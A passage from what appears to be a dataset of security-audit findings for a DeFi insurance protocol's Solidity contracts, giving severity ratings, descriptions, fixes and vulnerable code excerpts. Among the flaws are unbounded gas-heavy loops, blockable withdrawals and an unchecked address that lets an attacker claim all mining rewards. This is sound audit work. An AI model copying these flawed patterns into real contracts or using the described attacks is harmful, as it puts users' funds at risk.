\\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n -LiquidityMining can't accept single ERC1155 tokensчhighчThe contract `LiquidityMining` is also defined as an `ERC1155Receiver`\\n```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n\\nThe finalized EIP-1155 standard states that a contract which acts as an EIP-1155 Receiver must implement all the functions in the `ERC1155TokenReceiver` interface to be able to accept transfers.\\nThese are indeed implemented here:\\n```\\nfunction onERC1155Received(\\n```\\n\\n```\\nfunction onERC1155BatchReceived(\\n```\\n\\nThe standard states that they will be called and they MUST return a specific `byte4` value, otherwise the transfer will fail.\\nHowever one of the methods returns an incorrect value. This seems to an error generated by a copy/paste action.\\n```\\nfunction onERC1155Received(\\n address operator,\\n address from,\\n uint256 id,\\n uint256 value,\\n bytes memory data\\n)\\n external\\n pure\\n override\\n returns(bytes4)\\n{\\n return bytes4(keccak256(\"onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)\"));\\n}\\n```\\n\\nThe value returned is equal to\\n`bytes4(keccak256(\"onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)\"));`\\nBut it should be\\n`bytes4(keccak256(\"onERC1155Received(address,address,uint256,uint256,bytes)\"))`.\\nOn top of this, the contract MUST implement the ERC-165 standard to correctly respond to `supportsInterface`.чChange the return value of `onERC1155Received` to be equal to `0xf23a6e61` which represents `bytes4(keccak256(\"onERC1155Received(address,address,uint256,uint256,bytes)\"))`.\\nAlso, make sure to implement `supportsInterface` to signify support of `ERC1155TokenReceiver` to accept transfers.\\nAdd tests to check the functionality is correct and make sure these kinds of bugs do not exist in the future.\\nMake sure to read the EIP-1155 and EIP-165 standards in detail and implement them correctly.чч```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n -DAI is assumed to have the same price as DAIx in the staking contractчhighчWhen a liquidity provider stakes tokens to the `BMIDAIStaking` contract, the equal amount of DAI and DAIx are transferred from the pool contract.\\n```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, \"BMIDAIStaking: Can't stake zero tokens\");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\nчOnly the corresponding amount of DAI should be transferred to the pool.чч```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, \"BMIDAIStaking: Can't stake zero tokens\");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n -_updateWithdrawalQueue can run out of gasчhighчWhen there's not enough collateral to withdraw liquidity from a policy book, the withdrawal request is added to a queue. The queue is supposed to be processed and cleared once there are enough funds for that. The only way to do so is the `_updateWithdrawalQueue` function that is caller when new liquidity is added:\\n```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n\\nThe problem is that this function can only process all queue until the pool run out of available funds or the whole queue is going to be processed. If the queue is big enough, this process can be stuck.чPass the parameter to the `_updateWithdrawalQueue` that defines how many requests to process in the queue per one call.чч```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n -The PolicyBook should make DAI transfers inside the contractчmediumчThe `PolicyBook` contract gives full allowance over DAI tokens to the other contracts:\\n```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n\\nThat behavior is dangerous because it's hard to keep track of and control the contract's DAI balance. And it's also hard to track in the code where the balance of the `PolicyBook` can be changed from.чIt's better to perform all the transfers inside the `PolicyBook` contract. So if the `bmiDaiStaking` and the `claimVoting` contracts need DAI tokens from the `PolicyBook`, they should call some function of the `PolicyBook` to perform transfers.чч```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n -The totalCoverTokens is only updated when the policy is boughtчmediumчThe `totalCoverTokens` value represents the amount of collateral that needs to be locked in the policy book. It should be changed either by buying a new policy or when an old policy expires. The problem is that when the old policy expires, this value is not updated; it is only updated when someone buys a policy by calling the `_updateEpochsInfo` function:\\n```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n\\nUsers waiting to withdraw liquidity should wait for someone to buy the policy to update the `totalCoverTokens`.чResolution\\nThe `updateEpochsInfo` function is now public and can be called by anyone.\\nMake sure it's possible to call the `_updateEpochsInfo` function without buying a new policy.чч```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n -Unbounded loops in LiquidityMiningчmediumчThere are some methods that have unbounded loops and will fail when enough items exist in the arrays.\\n```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_membersNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n\\nThese methods will fail when lots of items will be added to them.чConsider adding limits (from, to) when requesting the items.чч```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n -The _removeFromQueue is very gas greedyчmediumчThe `_removeFromQueue` function is supposed to remove `_countToRemove` elements from the queue:\\n```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n\\nThis function uses too much gas, which makes it easier to make attacks on the system. Even if only one request is removed and executed, this function rewrites all the requests to the storage.чThe data structure should be changed so this function shouldn't rewrite the requests that did not change. For example, it can be a mapping `(unit => address)` with 2 indexes `(start, end)` that are only increasing.чч```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n -Withdrawal with zero amount is possibleчmediumчWhen creating a withdrawal request, the amount of tokens to withdraw is passed as a parameter:\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n\\nThe problem is that this parameter can be zero, and the function will be successfully executed. Moreover, this request can then be added to the queue, and the actual withdrawal will also be executed with zero value. Addresses that never added any liquidity could spam the system with these requests.чDo not allow withdrawals of zero tokens.чч```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n -The withdrawal queue is only updated when the liquidity is addedчmediumчSometimes when the amount of liquidity is not much higher than the number of tokens locked for the collateral, it's impossible to withdraw liquidity. For a user that wants to withdraw liquidity, a withdrawal request is created. If the request can't be executed, it's added to the withdrawal queue, and the user needs to wait until there's enough collateral for withdrawal. There are potentially 2 ways to achieve that: either someone adds more liquidity or some existing policies expire.\\nCurrently, the queue can only be cleared when the internal `_updateWithdrawalQueue` function is called. And it is only called in one place while adding liquidity:\\n```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\nчIt would be better if the queue could be processed when some policies expire without adding new liquidity. For example, there may be an external function that allows users to process the queue.чч```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n -Optimize gas usage when checking max length of arraysчlowчThere are a few cases where some arrays have to be limited to a number of items.\\nAnd the max size is enforced by removing the last item if the array reached max size + 1.\\n```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n\\n```\\nif (topUsers.length == MAX\\_TOP\\_USERS\\_SIZE.add(1)) {\\n topUsers.pop();\\n}\\n```\\n\\n```\\nif (\\_addresses.length == MAX\\_GROUP\\_LEADERS\\_SIZE.add(1)) {\\n groupsLeaders[\\_referralLink].pop();\\n}\\n```\\n\\nA simpler and cheaper way to check if an item should be removed is to change the condition to\\n```\\nif (limitedSizedArray.length > MAX\\_DEFINED\\_SIZE\\_FOR\\_ARRAY) {\\n limitedSizedArray.pop();\\n}\\n```\\n\\nThis check does not need or do a SafeMath call (which is more expensive), and because of the limited number of items, as well as a practical impossibility to add enough items to overflow the limit, makes it a preferred way to check the maximum limit.чRewrite the checks and remove SafeMath operations, as well as the addition by 1 and change the check to a “greater than” verification.чч```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n -Methods return values that are never usedчlowчWhen a user calls `investDAI` these 3 methods are called internally:\\n```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n\\nEach method returns a boolean, but the value is never used. It is also unclear what the value should represent.чRemove the returned variable or use it in method `investDAI`.чч```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n -Save some gas when looping over state arraysчlowчThere are a few loops over state arrays in `LiquidutyMining`.\\n```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < topUsers.length; i++) {\\n```\\n\\nConsider caching the length in a local variable to reduce gas costs.\\nSimilar to\\n```\\nuint256 \\_usersNumber = allUsers.length;\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\nчReduce gas cost by caching array state length in a local variable.чч```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n -Optimize gas costs when handling liquidity start and end timesчlowчWhen the `LiquidityMining` contract is deployed, `startLiquidityMiningTime` saves the current block timestamp.\\n```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n\\nThis value is never changed.\\nThere also exists an end limit calculated by `getEndLMTime`.\\n```\\nfunction getEndLMTime() public view override returns (uint256) {\\n return startLiquidityMiningTime.add(2 weeks);\\n}\\n```\\n\\nThis value is also fixed, once the start was defined.\\nNone of the values change after the contract was deployed. This is why you can use the immutable feature provided by Solidity.\\nIt will reduce costs significantly.\\n```\\ncontract A {\\n uint public immutable start;\\n uint public immutable end;\\n \\n constructor() {\\n start = block.timestamp;\\n end = block.timestamp + 2 weeks;\\n }\\n}\\n```\\n\\nThis contract defines 2 variables: `start` and `end` and their value is fixed on deploy and cannot be changed.\\nIt does not need to use `SafeMath` because there's no risk of overflowing.\\nSetting `public` on both variables creates getters, and calling `A.start()` and `A.end()` returns the respective values.\\nHaving set as immutable does not request EVM storage and makes them very cheap to access.чUse Solidity's immutable feature to reduce gas costs and rename variables for consistency.\\nUse the example for inspiration.чч```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n -Computing the quote should be done for a positive amount of tokensчlowчWhen a policy is bought, a quote is requested from the `PolicyQuote` contract.\\n```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n\\n```\\nuint256 \\_totalPrice = policyQuote.getQuote(\\_totalSeconds, \\_coverTokens, address(this));\\n```\\n\\nThe `getQuote` call is then forwarded to an internal function\\n```\\nfunction getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n external view override returns (uint256 \\_daiTokens)\\n{\\n \\_daiTokens = \\_getQuote(\\_durationSeconds, \\_tokens, \\_policyBookAddr);\\n}\\n```\\n\\n```\\nfunction \\_getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n internal view returns (uint256)\\n{\\n```\\n\\nThere are some basic checks that make sure the total covered tokens with the requested quote do not exceed the total liquidity. On top of that check, it makes sure the total liquidity is positive.\\n```\\nrequire(\\_totalCoverTokens.add(\\_tokens) <= \\_totalLiquidity, \"PolicyBook: Requiring more than there exists\");\\nrequire(\\_totalLiquidity > 0, \"PolicyBook: The pool is empty\");\\n```\\n\\nBut there is no check for the number of quoted tokens. It should also be positive.чAdd an additional check for the number of quoted tokens to be positive. The check could fail or return 0, depending on your use case.\\nIf you add a check for the number of quoted tokens to be positive, the check for `_totalLiquidity` to be positive becomes obsolete and can be removed.чч```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n -Anyone can win all the funds from the LiquidityMining without investing any DAIчhighчWhen a user decides to `investDAI` in the `LiquidityMining` contract, the policy book address is passed as a parameter:\\n```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n\\nBut this parameter is never checked and only used at the end of the function:\\n```\\nIPolicyBook(\\_policyBookAddr).addLiquidityFromLM(msg.sender, \\_tokensAmount);\\n```\\n\\nThe attacker can pass the address of a simple multisig that will process this transaction successfully without doing anything. And pretend to invest a lot of DAI without actually doing that to win all the rewards in the `LiquidityMining` contract.чCheck that the pool address is valid.чч```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n -Liquidity withdrawal can be blockedчhighчThe main problem in that issue is that the liquidity provider may face many potential issues when withdrawing the liquidity. Under some circumstances, a normal user will never be able to withdraw the liquidity. This issue consists of multiple factors that are interconnected and share the same solution.\\nThere are no partial withdrawals when in the queue. When the withdrawal request is added to the queue, it can only be processed fully:\\n```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n\\nBut when the request is not in the queue, it can still be processed partially, and the rest of the locked tokens will wait in the queue.\\n```\\n} else if (\\_availableLiquidity < convertDAIXtoDAI(\\_tokensToWithdraw)) {\\n uint256 \\_availableDAIxTokens = convertDAIToDAIx(\\_availableLiquidity);\\n uint256 \\_currentWithdrawalAmount = \\_tokensToWithdraw.sub(\\_availableDAIxTokens);\\n withdrawalsInfo[\\_msgSender()].withdrawalAmount = \\_currentWithdrawalAmount;\\n \\n aggregatedQueueAmount = aggregatedQueueAmount.add(\\_currentWithdrawalAmount);\\n withdrawalQueue.push(\\_msgSender());\\n \\n \\_withdrawLiquidity(\\_msgSender(), \\_availableDAIxTokens);\\n} else {\\n```\\n\\nIf there's a huge request in the queue, it can become a bottleneck that does not allow others to withdraw even if there is enough free liquidity.\\nWithdrawals can be blocked forever by the bots.\\nThe withdrawal can only be requested if there are enough free funds in the contract. But once these funds appear, the bots can instantly buy a policy, and for the normal users, it will be impossible to request the withdrawal. Even when a withdrawal is requested and then in the queue, the same problem appears at that stage.\\nThe policy can be bought even if there are pending withdrawals in the queue.чOne of the solutions would be to implement the following changes, but the team should thoroughly consider them:\\nAllow people to request the withdrawal even if there is not enough liquidity at the moment.\\nDo not allow people to buy policies if there are pending withdrawals in the queue and cannot be executed.\\n(Optional) Even when the queue is empty, do not allow people to buy policies if there is not enough liquidity for the pending requests (that are not yet in the queue).\\n(Optional if the points above are implemented) Allow partial executions of the withdrawals in the queue.чч```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n -The totalCoverTokens can be decreased before the claim is committedчhighчThe `totalCoverTokens` is decreased right after the policy duration ends (_endEpochNumber). When that happens, the liquidity providers can withdraw their funds:\\n```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n\\n```\\nuint256 \\_countOfPassedEpoch = block.timestamp.sub(epochStartTime).div(EPOCH\\_DURATION);\\n\\nnewTotalCoverTokens = totalCoverTokens;\\nlastEpochUpdate = currentEpochNumber;\\nnewEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\nfor (uint256 i = lastEpochUpdate; i < newEpochNumber; i++) {\\n newTotalCoverTokens = newTotalCoverTokens.sub(epochAmounts[i]); \\n}\\n```\\n\\nOn the other hand, the claim can be created while the policy is still “active”. And is considered active until one week after the policy expired:\\n```\\nfunction isPolicyActive(address \\_userAddr, address \\_policyBookAddr) public override view returns (bool) {\\n PolicyInfo storage \\_currentInfo = policyInfos[\\_userAddr][\\_policyBookAddr];\\n\\n if (\\_currentInfo.endTime == 0) {\\n return false;\\n }\\n\\n return \\_currentInfo.endTime.add(STILL\\_CLAIMABLE\\_FOR) > block.timestamp;\\n}\\n```\\n\\nBy the time when the claim is created + voted, the liquidity provider can potentially withdraw all of their funds already, and the claim will fail.чMake sure that there will always be enough funds for the claim.чч```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n -The totalCoverTokens is not decreased after the claim happenedчhighчWhen the claim happens and the policy is removed, the `totalCoverTokens` should be decreased instantly, that's why the scheduled reduction value is removed:\\n```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n\\nBut the `totalCoverTokens` is not changed and will have the coverage from the removed policy forever.чDecrease the `totalCoverTokens` inside the `commitClaim` function.чч```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n -The Queue remove function does not remove the item completelyчhighчWhen removing an item in a queue, the following function is used:\\n```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n\\nAs the result, the `baseQueue.queue[addrToRemove]` is not deleted, so the `contains` function will still return `True` after the removal.чRemove the element from the queue completely.чч```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n -Optimization issueчmediumчThe codebase is huge, and there are still a lot of places where these complications and gas efficiency can be improved.\\n`_updateTopUsers`, `_updateGroupLeaders`, `_updateLeaderboard` are having a similar mechanism of adding users to a sorted set which makes more storage operations than needed:\\n```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n\\nInstead of doing 2 operations per item that is lower than the new_item, same can be done with one operation: while `topUsers[_tmpIndex]` is lower than the new itemtopUsers[_tmpIndex + 1] = `topUsers[_tmpIndex]`.\\ncreating the Queue library looks like overkill `for` the intended task. It is only used `for` the withdrawal queue in the PolicyBook. The structure stores and processes extra data, which is unnecessary and more expensive. A larger codebase also has a higher chance of introducing a bug (and it happened here https://github.com/ConsenSys/bridge-mutual-audit-2021-03/issues/25). It's usually better to have a simpler and optimized version like described here issue 5.14.\\nThere are a few `for` loops that are using `uint8` iterators. It's unnecessary and can be even more expensive because, under the hood, it's additionally converted to `uint256` all the time. In general, shrinking data to `uint8` makes sense to optimize storage slots, but that's not the case here.\\nThe value that is calculated in a loop can be obtained simpler by just having a 1-line formula:\\n```\\nfunction \\_getAvailableMonthForReward(address \\_userAddr) internal view returns (uint256) {\\n uint256 \\_oneMonth = 30 days;\\n uint256 \\_startRewardTime = getEndLMTime();\\n \\n uint256 \\_countOfRewardedMonth = countsOfRewardedMonth[usersTeamInfo[\\_userAddr].teamAddr][\\_userAddr];\\n uint256 \\_numberOfMonthForReward;\\n \\n for (uint256 i = \\_countOfRewardedMonth; i < MAX\\_MONTH\\_TO\\_GET\\_REWARD; i++) {\\n if (block.timestamp > \\_startRewardTime.add(\\_oneMonth.mul(i))) {\\n \\_numberOfMonthForReward++;\\n } else {\\n break;\\n }\\n }\\n \\n return \\_numberOfMonthForReward;\\n}\\n```\\n\\nThe mapping is using 2 keys, but the first key is strictly defined by the second one, so there's no need for it:\\n```\\n// Referral link => Address => count of rewarded month\\nmapping (address => mapping (address => uint256)) public countsOfRewardedMonth;\\n```\\n\\nThere are a lot of structures in the code with duplicated and unnecessary data, for example:\\n```\\nstruct UserTeamInfo {\\n string teamName;\\n address teamAddr;\\n \\n uint256 stakedAmount;\\n bool isNFTDistributed;\\n}\\n```\\n\\nHere the structure is created for every team member, duplicating the team name for each member.чOptimize and simplify the code.чч```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n -The aggregatedQueueAmount value is used inconsistentlyчmediumчThe `aggregatedQueueAmount` variable represents the cumulative DAIx amount in the queue that is waiting for the withdrawal. When requesting the withdrawal, this value is used as the amount of DAI that needs to be withdrawn, which may be significantly different:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n \"PB: Not enough available liquidity\");\\n```\\n\\nThat may lead to allowing the withdrawal request even if it shouldn't be allowed and the opposite.чConvert `aggregatedQueueAmount` to DAI in the `_requestWithdrawal`.чч```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n \"PB: Not enough available liquidity\");\\n```\\n -The claim can only be done onceчmediumчWhen the claim happens, the policy is removed afterward:\\n```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n 